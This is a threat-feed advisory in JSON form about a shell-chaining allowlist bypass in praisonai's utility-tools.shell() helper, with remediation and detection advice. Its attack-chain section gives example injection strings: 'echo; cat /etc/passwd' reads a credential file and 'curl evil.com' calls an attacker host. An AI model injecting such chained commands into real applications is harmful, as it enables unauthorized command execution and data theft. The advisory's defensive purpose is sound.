{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/products/praisonai-1.5.1-1.7.1/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["praisonai (1.5.1-1.7.1)"],"_cs_severities":["high"],"_cs_tags":["command-injection","npm-package","nodejs","rce","allowlist-bypass","ghsa"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe npm package \u003ccode\u003epraisonai\u003c/code\u003e has been identified with a command injection vulnerability (GHSA-5jv7-2mjm-h6qj) affecting versions 1.5.1 through 1.7.1. The \u003ccode\u003eutility-tools.shell()\u003c/code\u003e helper, located in \u003ccode\u003edist/tools/utility-tools.js\u003c/code\u003e, is designed to execute \u0026quot;safe read-only commands\u0026quot; by checking only the first whitespace-delimited token against an allowlist (e.g., \u003ccode\u003els\u003c/code\u003e, \u003ccode\u003ecat\u003c/code\u003e, \u003ccode\u003eecho\u003c/code\u003e). However, the function then passes the entire input string to Node.js's \u003ccode\u003echild_process.exec()\u003c/code\u003e, which executes it via a system shell. This policy/parser differential allows an attacker to prefix a malicious command with an allowed command and shell metacharacters (e.g., \u003ccode\u003eecho ok; malicious_command\u003c/code\u003e), bypassing the intended allowlist and executing arbitrary commands with the PraisonAI process's privileges. 
This flaw enables potential file system access, network exfiltration, or denial of service within applications using this vulnerable library.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access\u003c/strong\u003e: An attacker identifies an application or service that integrates the \u003ccode\u003epraisonai\u003c/code\u003e library (versions 1.5.1-1.7.1) and exposes functionality that processes user-controlled input through the vulnerable \u003ccode\u003eutility-tools.shell()\u003c/code\u003e helper.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCommand Crafting\u003c/strong\u003e: The attacker crafts a malicious command string. This string starts with a command found in \u003ccode\u003eutility-tools.shell()\u003c/code\u003e's \u003ccode\u003esafeCommands\u003c/code\u003e allowlist (e.g., \u003ccode\u003eecho\u003c/code\u003e, \u003ccode\u003els\u003c/code\u003e) followed by a shell metacharacter (e.g., \u003ccode\u003e;\u003c/code\u003e, \u003ccode\u003e\u0026amp;\u0026amp;\u003c/code\u003e, \u003ccode\u003e|\u003c/code\u003e) and the desired arbitrary command (e.g., \u003ccode\u003ecat /etc/passwd\u003c/code\u003e, \u003ccode\u003ecurl evil.com\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eVulnerable Function Call\u003c/strong\u003e: The crafted malicious command string is submitted as input to the vulnerable application. 
The application, in turn, passes this string to \u003ccode\u003epraisonai\u003c/code\u003e's \u003ccode\u003eutility-tools.shell()\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAllowlist Check Bypass\u003c/strong\u003e: The \u003ccode\u003eutility-tools.shell()\u003c/code\u003e function performs its safety check by splitting the input string on whitespace and validating only the \u003cem\u003efirst token\u003c/em\u003e (e.g., \u003ccode\u003eecho\u003c/code\u003e) against its internal \u003ccode\u003esafeCommands\u003c/code\u003e allowlist. Since the first token is allowed, the check passes.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eShell Execution\u003c/strong\u003e: The function proceeds to pass the \u003cem\u003eentire, unaltered malicious command string\u003c/em\u003e (e.g., \u003ccode\u003eecho; cat /etc/passwd\u003c/code\u003e) to Node.js's \u003ccode\u003echild_process.exec()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eArbitrary Command Execution\u003c/strong\u003e: \u003ccode\u003echild_process.exec()\u003c/code\u003e invokes the system's default shell (e.g., \u003ccode\u003esh -c\u003c/code\u003e on Linux, \u003ccode\u003ecmd.exe /c\u003c/code\u003e on Windows), which interprets the full string. 
The shell executes the initial allowed command, then, upon encountering the shell metacharacter, proceeds to execute the appended arbitrary command (e.g., \u003ccode\u003ecat /etc/passwd\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImpact\u003c/strong\u003e: The arbitrary command is executed with the privileges of the PraisonAI application process, potentially leading to sensitive data exposure, file modification, network communication, or system disruption, depending on the command and process context.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eIf an application or service exposes the vulnerable \u003ccode\u003eutility-tools.shell()\u003c/code\u003e helper to untrusted input, the safe-command allowlist becomes ineffective. Attackers can execute arbitrary shell commands with the PraisonAI process privileges. The specific consequences are determined by the embedding application's context and permissions, but can include unauthorized reading of sensitive files and secrets (e.g., credentials, configuration files), modification of files or application state, invocation of local tools, network exfiltration of data if egress is permitted, and denial of service through resource-intensive commands. While no specific victim numbers are available, the broad applicability of Node.js applications means any sector using \u003ccode\u003epraisonai\u003c/code\u003e between versions 1.5.1 and 1.7.1 could be affected.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePatch Vulnerable Library\u003c/strong\u003e: Immediately update \u003ccode\u003epraisonai\u003c/code\u003e to a version higher than 1.7.1 (or explicitly prior to 1.5.1) to address GHSA-5jv7-2mjm-h6qj. 
The advisory suggests avoiding \u003ccode\u003eexec(command)\u003c/code\u003e for policy-checked strings and instead using \u003ccode\u003eexecFile()\u003c/code\u003e or \u003ccode\u003espawn()\u003c/code\u003e with \u003ccode\u003eshell: false\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDeploy Detection Rules\u003c/strong\u003e: Implement the provided Sigma rules to detect patterns indicative of this exploitation on both Linux/macOS and Windows hosts that run Node.js applications.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eReview Code for Vulnerable Usage\u003c/strong\u003e: Developers should review their codebase for any instances where \u003ccode\u003epraisonai/dist/tools/utility-tools.js\u003c/code\u003e is imported and its \u003ccode\u003eshell()\u003c/code\u003e function is called with user-controlled input. Refactor such calls to ensure input is properly sanitized or leverage safer alternatives as described in the \u0026quot;Suggested Fix\u0026quot; section of the advisory (GHSA-5jv7-2mjm-h6qj).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eEnable Detailed Process Logging\u003c/strong\u003e: Ensure \u003ccode\u003eprocess_creation\u003c/code\u003e logging (e.g., via Sysmon on Windows, Auditd/eBPF on Linux) is enabled and configured to capture full command lines, parent-child process relationships, and image paths to effectively utilize the provided Sigma rules.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-06-18T15:03:35Z","date_published":"2026-06-18T15:03:35Z","id":"https://feed.craftedsignal.io/briefs/2026-06-praisonai-shell-bypass/","summary":"The npm package `praisonai` versions 1.5.1 through 1.7.1 contains a command injection vulnerability (GHSA-5jv7-2mjm-h6qj) in its `utility-tools.shell()` helper, which allows attackers to bypass a 'safe read-only' command allowlist by appending arbitrary shell commands with metacharacters after an allowed command, leading to arbitrary code execution with the PraisonAI process 
privileges.","title":"npm PraisonAI utility-tools.shell() Allowlist Bypass via Shell Chaining (GHSA-5jv7-2mjm-h6qj)","url":"https://feed.craftedsignal.io/briefs/2026-06-praisonai-shell-bypass/"}],"language":"en","title":"CraftedSignal Threat Feed - Praisonai (1.5.1-1.7.1)","version":"https://jsonfeed.org/version/1.1"}